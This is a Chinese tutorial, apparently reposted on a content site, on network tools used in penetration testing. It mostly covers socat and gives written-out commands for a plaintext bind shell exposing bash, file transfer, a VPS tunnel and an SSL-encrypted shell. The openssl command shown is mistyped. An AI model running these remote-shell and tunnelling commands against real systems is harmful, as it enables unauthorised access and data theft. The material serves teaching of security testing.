渗透测试中的哪些网络军刀

本文,为大家简单介绍我们常见的网络工具的一些使用方法。

快捷目录

Socat

Socat 是 Linux 下的一个多功能的网络工具。可以看做是 Netcat 的加强版。Socat 的主要特点就是在两个数据流之间建立通道,且支持众多协议和链接方式。如 IP、TCP、 UDP、IPv6、PIPE等。Nc可能是因为比较久没有维护,确实显得有些陈旧了。

😘安装

apt-get install socat

🤖监听 聊天工具

首先,我们在服务端开始监听。(谁做服务端,谁就要加stdout)

socat -dd tcp-listen:7777 stdout

渗透测试中的哪些网络军刀接下来,我们客户端连接。

socat - tcp4:192.168.50.77:7777
渗透测试中的哪些网络军刀

🐸正 反向弹shell

目标机(受害端)执行命令

socat tcp4-listen:8000 exec:/usr/bin/bash

攻击端执行命令

socat - tcp4:192.168.50.77:8000

效果如下:

渗透测试中的哪些网络军刀

😎文件传输

文件传输是最常用的,让我们一起看看如何实现。发送端执行命令

socat tcp4-listen:8000 file:kali.txt

接收端执行命令

socat tcp4:192.168.50.77:8000 file:kali.txt,creat
渗透测试中的哪些网络军刀

🐻‍❄️搭建异地组网

需要注意的是,服务端需为公网vps。

socat -d -d TCP-LISTEN:11443,reuseaddr TUN:192.168.255.1/24,up

客户端

socat TCP:xxx.xxx.xxx.xxx:11443 TUN:192.168.255.2/24,up #注意为公网IP和开启相关端口

📧SSL 连接

前面我们使用 socat 传 shell 的时候,其实交流的内容是明文传输的。为了让信息传输更加安全,我们借助 SSL 证书来完成这个操作。首先使用 openssl 这个软件,生成一个自签证书,为了让 socat 可以识别我们的证书和密钥,首先要把证书和密钥放进同一个文件中,并以.pem格式保存

openssl reg -newkey rsa:2048 -nodes -keyout bind_shell.key -x509 -days 36
2 -out bind shell.crt

接下来,服务端执行命令

socat OPENSSL-LISTEN:443,cert=bind_shell.pem,verify=0,fork EXEC:/bin/bash

客户端执行命令

socat - OPENSSL:监听端的 IP:443,verify=0

当然,还有更多的玩法。大家可以参考命令帮助。

渗透测试中的哪些网络军刀

CryptCat

CryptCat具有双向加密功能。它可以跨网络连接读取和写入数据,使用 TCP 或 UDP协议。同时对通过网络传输的数据进行加密。详细教程请移步历史文章。

渗透测试中的哪些网络军刀
NC增强工具CryptCat

Netcat

之前也写过详细的使用文章,详细教程请移步历史文章。

渗透测试中的哪些网络军刀
Netcat(瑞士军刀)你想知道的都在这里

本内容观点仅代表发布作者本人观点立场,欣文网平台只做信息内容展示和存储。发布作者:全网转载,转转请注明出处:https://www.xinenw.com/34468

(0)
上一篇 2024年8月11日 19:31
下一篇 2024年8月11日 21:16

相关推荐

  • 北京人讨厌的柳絮背后,有一个过敏产业链

    来源:真故研究所 作者:文静 最美人间四月天,有人踏青赏花,有人流泪回家。 公开数据显示,我国100人当中就有40个人会过敏,抗过敏产业市场近300亿。氯雷他定成为抗过敏药中的硬通货,有时晚间遇用药高峰,还一粒难求,全国30多家内外资企业在争夺这一市场。人类过敏史持续几个世纪,过敏人有多苦,背后的过敏产业就有多旺。 过敏人抗絮,也挺花钱 “北京四月的雪又来了…

    2024年5月12日
    13700
  • 风靡古代的鹿肉,为什么现在没人吃了

    相比金贵的鹿茸,鹿肉从都不是主角,然而它也曾是饭桌常客。 在幅员辽阔的中国大地上,每一寸土地、每一条河流都孕育了独特的风味。 作为饮食大国,中国的菜系之多、取材之广,令人叹为观止。飞禽走兽、山珍海味都曾是餐桌上的常客。 但有些食材你可能曾听说,却从未亲自品尝过。鹿肉,便是其中之一。 或许你会疑惑:鹿肉真的能吃吗?为什么现在很少有人能吃到鹿肉? 【更多有趣的知…

    2024年5月24日
    12300
  • 荣耀昨晚发布的新机,这外观有点骚啊

    不得不说,这小东西还挺别致。 昨晚,荣耀正式发布了他们家的首款竖折屏——Magic V Flip。 关注折叠屏的机友,应该有发现,荣耀在这一块是有点自己的理解在身上的。 尤其是去年发布的荣耀 V Purse,简直是骚气满满。 这次的荣耀 Magic V Flip,就跟 V Purse 有一种姐妹机的感觉。 一个横折一个竖折,气质都很相近。 相比友商的小折叠,…

    2024年6月18日
    11500
  • 2024年了,iPhone 终于能刷门禁和电梯了。

     马上就要到九月了,苹果又要发布它的新 iPhone 了。 按照往年的情况,到了这个时间点,网上就会出现很多关于新 iPhone 的爆料。 这不,前两天就有爆料说,这次 iPhone 16 系列搭载的 iOS 18.1 系统上, “ 开发者很快将可使用安全元件提供 app 内 NFC 数据交换功能 ” 。 我给大家翻译一下:以后 iPhone 的 NFC 终…

    2024年8月26日
    7400
  • 破内卷与拒躺平:寻欲望平衡,绘人生灿烂

    石祎陈 南京师范大学 ——2024年度红网“青椒计划”系列作品 据澎湃新闻报道,6月23日,在中国人民大学2024年毕业典礼和学位授予仪式上,该校哲学院“患癌教授”朱锐通过视频,探讨了当下被热议的“内卷与躺平”概念。 朱锐教授关于“内卷与躺平”的探讨,宛如一盏明灯,为即将步入社会的八千余名毕业生照亮了前行的道路。 内卷,这一当下社会的热词,背后是欲望在外在机…

    2024年7月5日
    10800

发表回复

登录后才能评论

联系我们

400-800-8888

在线咨询: QQ交谈

邮件A:xinenw@qq.com

邮箱B:xinenw@163.com

工作时间:周一至周五,8:30-23:30;周六周日10:30-18:30;节假日休息

关注微信
欣文网内容建设升级中,欢迎您参与意见征集进行评论,只为打造更好的内容平台!